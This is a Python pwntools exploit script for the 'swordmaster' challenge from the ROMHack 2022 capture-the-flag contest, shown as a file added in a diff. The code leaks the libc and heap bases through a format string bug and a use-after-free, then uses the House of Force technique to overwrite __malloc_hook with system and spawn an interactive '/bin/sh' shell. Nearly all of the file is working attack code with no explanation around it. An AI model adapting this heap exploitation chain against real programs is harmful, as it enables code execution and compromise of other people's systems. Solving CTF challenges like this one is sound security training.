■ ■ ■ ■ ■ ■
CTFs/ROMHack2022/swordmaster/exploit.py
| 1 | + | from pwn import * |
| 2 | + | import sys |
| 3 | + | if not sys.warnoptions: |
| 4 | + | import warnings |
| 5 | + | warnings.simplefilter("ignore") |
| 6 | + | |
| 7 | + | elf = ELF("./swordmaster") |
| 8 | + | libc = ELF("./glibc/libc.so.6") |
| 9 | + | p = elf.process(['./glibc/ld-linux-x86-64.so.2','./swordmaster'],env={"LD\_PRELOAD":"./glibc/libc.so.6"}) |
| 10 | + | |
| 11 | + | # ---- SET NAME ---- |
| 12 | + | p.sendline('/bin/sh\0') |
| 13 | + | |
| 14 | + | # ---- LEAK LIBC BASE WITH FORMAT STRING BUG ---- |
| 15 | + | p.recvuntil(b'>> ') |
| 16 | + | p.sendline(b'%13$p') |
| 17 | + | p.recvuntil('There is no ') |
| 18 | + | |
| 19 | + | libc_leak = p.recvline().split(b' ')[0] |
| 20 | + | libc_leak = int(libc_leak[2:], 16) |
| 21 | + | libc.address = libc_leak - 0x21c87 |
| 22 | + | |
| 23 | + | log.info("LEAKED LIBC BASE: " + hex(libc.address)) |
| 24 | + | |
| 25 | + | |
| 26 | + | # ---- LEAK HEAP BASE WITH UAF BUG ------- |
| 27 | + | p.recvuntil(b'>> ') |
| 28 | + | p.sendline(b'5') |
| 29 | + | p.recvuntil(b'>> ') |
| 30 | + | p.sendline(b'3') |
| 31 | + | p.recvuntil(b'Class: ') |
| 32 | + | |
| 33 | + | heap = p.recvline()[:-1] |
| 34 | + | heap = int.from_bytes(heap, 'little') - 4800 - 0x10 |
| 35 | + | |
| 36 | + | log.info("LEAKED HEAP BASE: " + str(hex(heap))) |
| 37 | + | |
| 38 | + | def malloc(size, data): |
| 39 | + | p.recvuntil(b'>> ') |
| 40 | + | p.sendline(b'1') |
| 41 | + | p.recvuntil(b'>> ') |
| 42 | + | p.sendline(str(size)) |
| 43 | + | p.recvuntil(b'>> ') |
| 44 | + | p.sendline(data) |
| 45 | + | |
| 46 | + | |
| 47 | + | |
| 48 | + | # ---- House Of Force Set-Up ---- |
| 49 | + | malloc(40, b'\x41'*47) |
| 50 | + | |
| 51 | + | # ---- Point top chunk to __malloc_hook ---- |
| 52 | + | distance = libc.sym.__malloc_hook - (heap + 0x1330) - 0x10 |
| 53 | + | malloc(distance, 'dummy') |
| 54 | + | |
| 55 | + | # ---- Overwrite __malloc_hook with system ---- |
| 56 | + | malloc(24, p64(libc.sym.system)) |
| 57 | + | |
| 58 | + | # ---- Point cmd at our name (/bin/sh) and call malloc to execute our overwritten hook ---- |
| 59 | + | cmd = heap + 0x1270 |
| 60 | + | p.recvuntil(b'>> ') |
| 61 | + | p.sendline(b'1') |
| 62 | + | p.recvuntil(b'>> ') |
| 63 | + | p.sendline(str(cmd)) |
| 64 | + | |
| 65 | + | p.interactive() |
| 66 | + | |